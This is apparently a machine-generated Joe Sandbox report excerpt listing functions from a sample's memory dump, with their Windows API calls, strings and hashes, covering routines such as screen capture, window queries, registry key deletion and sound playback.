Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: a1e3dbc281697352c7f7815844950c23b7becec3ff2eb0bbb8dda203b86d42db
Instruction ID: 59cfa3b45b4b9e76861ac4a6208571a83fee23ef164489f19e29ef57220c9e2f
Opcode Fuzzy Hash: a1e3dbc281697352c7f7815844950c23b7becec3ff2eb0bbb8dda203b86d42db
Instruction Fuzzy Hash: 3CC1AD34208211AFD714DF14D495F2ABBE5FF85318F14859CF5AA8B2A2CB35EC45CB92

Function 00B2255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00B225D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00B225E8
CreateCompatibleDC.GDI32(?), ref: 00B225F4
SelectObject.GDI32(00000000,?), ref: 00B22601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00B2266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00B226AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00B226D0
SelectObject.GDI32(?,?), ref: 00B226D8
DeleteObject.GDI32(?), ref: 00B226E1
DeleteDC.GDI32(?), ref: 00B226E8
ReleaseDC.USER32(00000000,?), ref: 00B226F3

Strings

(, xrefs: 00B2268D

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 3ccf570f18a1ebef9598174830278e776c1f84aae9c98ab28981b98f6ec58db9
Instruction ID: 0468a31f6b0769d3ad4b7af101401ca0e79dae15469677c1a9765be8e8b82cfa
Opcode Fuzzy Hash: 3ccf570f18a1ebef9598174830278e776c1f84aae9c98ab28981b98f6ec58db9
Instruction Fuzzy Hash: 9E61E076D00219EFCF15CFA4D884AAEBBF6FF48310F208569E959A7250D770A941DFA0

Function 00ADDA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00ADDAA1

Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD659
Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD66B
Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD67D
Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD68F
Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD6A1
Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD6B3
Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD6C5
Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD6D7
Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD6E9
Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD6FB
Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD70D
Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD71F
Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD731

_free.LIBCMT ref: 00ADDA96

Part of subcall function 00AD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000), ref: 00AD29DE
Part of subcall function 00AD29C8: GetLastError.KERNEL32(00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000,00000000), ref: 00AD29F0

_free.LIBCMT ref: 00ADDAB8
_free.LIBCMT ref: 00ADDACD
_free.LIBCMT ref: 00ADDAD8
_free.LIBCMT ref: 00ADDAFA
_free.LIBCMT ref: 00ADDB0D
_free.LIBCMT ref: 00ADDB1B
_free.LIBCMT ref: 00ADDB26
_free.LIBCMT ref: 00ADDB5E
_free.LIBCMT ref: 00ADDB65
_free.LIBCMT ref: 00ADDB82
_free.LIBCMT ref: 00ADDB9A

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 7d28868e338698166caf376ad6b48eaa2fa987d1074762d58f3180a8002ef85c
Instruction ID: 4f7ea926a543a2a22f8b4991ce06f929a89b876ca3ef31f9d3908f1a7f405a2e
Opcode Fuzzy Hash: 7d28868e338698166caf376ad6b48eaa2fa987d1074762d58f3180a8002ef85c
Instruction Fuzzy Hash: 3A315A326046049FEB21AB38E945B6A7BE8FF50354F15841BE45ADB3A1DA30AC40DB20

Function 00B0365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00B0369C
_wcslen.LIBCMT ref: 00B036A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00B03797
GetClassNameW.USER32(?,?,00000400), ref: 00B0380C
GetDlgCtrlID.USER32(?), ref: 00B0385D
GetWindowRect.USER32(?,?), ref: 00B03882
GetParent.USER32(?), ref: 00B038A0
ScreenToClient.USER32(00000000), ref: 00B038A7
GetClassNameW.USER32(?,?,00000100), ref: 00B03921
GetWindowTextW.USER32(?,?,00000400), ref: 00B0395D

Strings

%s%u, xrefs: 00B03734

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: bb13e75ea2ecd9de6f3aa2dd08180aecc06a38c2e661d21e8bb538420651b2de
Instruction ID: d87411b69691b57a733e6b8f332d6a792b65c927e41bb804f83287298f2b101b
Opcode Fuzzy Hash: bb13e75ea2ecd9de6f3aa2dd08180aecc06a38c2e661d21e8bb538420651b2de
Instruction Fuzzy Hash: 4E91AC71204706AFD718DF64C889FAABBECFF44750F108669F99A92190DB30EA45CB91

Function 00B04954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00B04994
GetWindowTextW.USER32(?,?,00000400), ref: 00B049DA
_wcslen.LIBCMT ref: 00B049EB
CharUpperBuffW.USER32(?,00000000), ref: 00B049F7
_wcsstr.LIBVCRUNTIME ref: 00B04A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00B04A64
GetWindowTextW.USER32(?,?,00000400), ref: 00B04A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00B04AE6
GetClassNameW.USER32(?,?,00000400), ref: 00B04B20
GetWindowRect.USER32(?,?), ref: 00B04B8B

Strings

ThumbnailClass, xrefs: 00B04A6F, 00B04AF1

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 3cf442bf880fa8f2a27a266d47d91161cf3eb6176b01841d20cedd43aae2c0e4
Instruction ID: 13bc76ba7465fb4f9f6cb2eed9a592567795b8f3cd96ee23bb977ab9810058b4
Opcode Fuzzy Hash: 3cf442bf880fa8f2a27a266d47d91161cf3eb6176b01841d20cedd43aae2c0e4
Instruction Fuzzy Hash: E7919AB21082059FDB14DF14C985BAA7BE8FF84314F0484A9FE859A1D6EB30ED45CBA1

Function 00B38D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AB9BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B38D5A
GetFocus.USER32 ref: 00B38D6A
GetDlgCtrlID.USER32(00000000), ref: 00B38D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00B38E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00B38ECF
GetMenuItemCount.USER32(?), ref: 00B38EEC
GetMenuItemID.USER32(?,00000000), ref: 00B38EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00B38F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00B38F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B38FA1

Strings

0, xrefs: 00B38E9F

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: af7911ac83445bb808e1f690e724adb9a1a88bad4c1e7302c5c5fde5987eabf0
Instruction ID: eb332ce1efe2d041a585da8d0ffa6cc87be4f909898e1caf531ba39e88c816d5
Opcode Fuzzy Hash: af7911ac83445bb808e1f690e724adb9a1a88bad4c1e7302c5c5fde5987eabf0
Instruction Fuzzy Hash: B281B1715043119FDB10DF24D885AAB7BE9FF88314F24099DF99997291DF30D905CBA2

Function 00B0DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00B0DC20
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00B0DC46
_wcslen.LIBCMT ref: 00B0DC50
_wcsstr.LIBVCRUNTIME ref: 00B0DCA0
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00B0DCBC

Strings

\VarFileInfo\Translation, xrefs: 00B0DCB4
StringFileInfo\, xrefs: 00B0DC8F
DefaultLangCodepage, xrefs: 00B0DD1F
%u.%u.%u.%u, xrefs: 00B0DD9A
04090000, xrefs: 00B0DCF2

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: 6dd1f83e456ba4e3d4573e534b558378fc531ed8b10f9f687c72783dbede8c1e
Instruction ID: 901ebf4162676aef8f2f443ad2bfb7f31f8f463b339a937e820101e649da0c63
Opcode Fuzzy Hash: 6dd1f83e456ba4e3d4573e534b558378fc531ed8b10f9f687c72783dbede8c1e
Instruction Fuzzy Hash: B441F2329402047AEB14A7B49D47FFF7BACEF45750F2401AAF900A71D2EB74DA0197A4

Function 00B2CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00B2CC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00B2CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00B2CD48

Part of subcall function 00B2CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00B2CCAA
Part of subcall function 00B2CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00B2CCBD
Part of subcall function 00B2CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B2CCCF
Part of subcall function 00B2CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00B2CD05
Part of subcall function 00B2CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00B2CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 00B2CCF3

Strings

RegDeleteKeyExW, xrefs: 00B2CCC9
advapi32.dll, xrefs: 00B2CCB8

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: dbdb6772e94360bca0512b998d7fe2a87159f2a24b02cc5bc1937023009a40d5
Instruction ID: 7838cb6903a5f924481f965fa6745113aac2bde0cab1f578c7bcdeff596d1f3a
Opcode Fuzzy Hash: dbdb6772e94360bca0512b998d7fe2a87159f2a24b02cc5bc1937023009a40d5
Instruction Fuzzy Hash: F5316075901129BBD7208BA5EC88EFFBFBCEF45750F1001A5A909E3150DB749E459BE0

Function 00B13D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B13D40
_wcslen.LIBCMT ref: 00B13D6D
CreateDirectoryW.KERNEL32(?,00000000), ref: 00B13D9D
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00B13DBE
RemoveDirectoryW.KERNEL32(?), ref: 00B13DCE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00B13E55
CloseHandle.KERNEL32(00000000), ref: 00B13E60
CloseHandle.KERNEL32(00000000), ref: 00B13E6B

Strings

\??\%s, xrefs: 00B13D5B
\, xrefs: 00B13D77
:, xrefs: 00B13D82

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: 2b97d266fe6d95150cec3dacb2ada46c742945d45a9bf67699e4f7fe94b0e251
Instruction ID: 448a7ad0957a31ca58e857ff799f133353720dc30d789dc68e9d79f7aec84d91
Opcode Fuzzy Hash: 2b97d266fe6d95150cec3dacb2ada46c742945d45a9bf67699e4f7fe94b0e251
Instruction Fuzzy Hash: D8317272900219AADB219FA0DC89FEF37FCEF88B00F5041B5F505E61A0EB7497848B64

Function 00B0E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00B0E6B4

Part of subcall function 00ABE551: timeGetTime.WINMM(?,?,00B0E6D4), ref: 00ABE555

Sleep.KERNEL32(0000000A), ref: 00B0E6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00B0E705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00B0E727
SetActiveWindow.USER32 ref: 00B0E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00B0E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 00B0E773
Sleep.KERNEL32(000000FA), ref: 00B0E77E
IsWindow.USER32 ref: 00B0E78A
EndDialog.USER32(00000000), ref: 00B0E79B

Strings

BUTTON, xrefs: 00B0E719

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 24b03a8f9b61b2a2876aa5b0f947e0779a1aaac1eb35363b9d15875d4bce698c
Instruction ID: 134fef3bd5e57064a0d82d657ebb500ffa495942e30be31bd69149f261ee88fe
Opcode Fuzzy Hash: 24b03a8f9b61b2a2876aa5b0f947e0779a1aaac1eb35363b9d15875d4bce698c
Instruction Fuzzy Hash: 63215471200205AFEB116F64EC8AA293FA9F755749F241865F52AA31F1DF71DC409B24

Function 00B0E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00B0EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00B0EA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B0EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00B0EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00B0EAA7

Strings

close PlayMe, xrefs: 00B0EA6E, 00B0EA9B
play PlayMe, xrefs: 00B0EAA2
alias PlayMe, xrefs: 00B0EA36
play PlayMe wait, xrefs: 00B0EA91
open , xrefs: 00B0EA0C
status PlayMe mode, xrefs: 00B0EA58

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 7122108443f9f6c199f71323e5dbea2d301efdf5dfb55cc6216644563e9bae7c
Instruction ID: 34f1d5f25e7704b4683ed99ae1c28e211296c9194f21ca2ebad29ca7d2c17a18
Opcode Fuzzy Hash: 7122108443f9f6c199f71323e5dbea2d301efdf5dfb55cc6216644563e9bae7c
Instruction Fuzzy Hash: A5115131A5021979D720A7A2DD4ADFF6BBCEBDAB40F0408A97811A70E1EFB04905C9B0

Function 00B05CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00B05CE2
GetWindowRect.USER32(00000000,?), ref: 00B05CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00B05D59
GetDlgItem.USER32(?,00000002), ref: 00B05D69
GetWindowRect.USER32(00000000,?), ref: 00B05D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00B05DCF
GetDlgItem.USER32(?,000003E9), ref: 00B05DDD
GetWindowRect.USER32(00000000,?), ref: 00B05DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00B05E31
GetDlgItem.USER32(?,000003EA), ref: 00B05E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00B05E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 00B05E67

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: f56bda51698071005f64a4fa68896e40125b23875b01baa4f502be37e89438cd
Instruction ID: 92039f89740c11e052a3b3ce1699a35e1c87b415176f78b33361cae9e3203138
Opcode Fuzzy Hash: f56bda51698071005f64a4fa68896e40125b23875b01baa4f502be37e89438cd
Instruction Fuzzy Hash: 3151F0B1A00615AFDB18CFA8DD89AAE7BF5FB48300F248269F915E7690DB709D04CF50

Function 00AB8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00AB8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AB8BE8,?,00000000,?,?,?,?,00AB8BBA,00000000,?), ref: 00AB8FC5

DestroyWindow.USER32(?), ref: 00AB8C81
KillTimer.USER32(00000000,?,?,?,?,00AB8BBA,00000000,?), ref: 00AB8D1B
DestroyAcceleratorTable.USER32(00000000), ref: 00AF6973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00AB8BBA,00000000,?), ref: 00AF69A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00AB8BBA,00000000,?), ref: 00AF69B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00AB8BBA,00000000), ref: 00AF69D4
DeleteObject.GDI32(00000000), ref: 00AF69E6

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 7fa776ae05e6f1e4e1ebf9f32d40ea767aeab8020c459e3e5de953c065c3f5eb
Instruction ID: 9e5184c6bca5d058a503c63ec44e305c1e782e2a9f043552aa26e96b7fb6f30e
Opcode Fuzzy Hash: 7fa776ae05e6f1e4e1ebf9f32d40ea767aeab8020c459e3e5de953c065c3f5eb
Instruction Fuzzy Hash: F361BB71102604DFCB259F6CCA48BB97BF9FB41312F244919E2469B561CB79AC82DFA0

Function 00AB9838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00AB9944: GetWindowLongW.USER32(?,000000EB), ref: 00AB9952

GetSysColor.USER32(0000000F), ref: 00AB9862

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
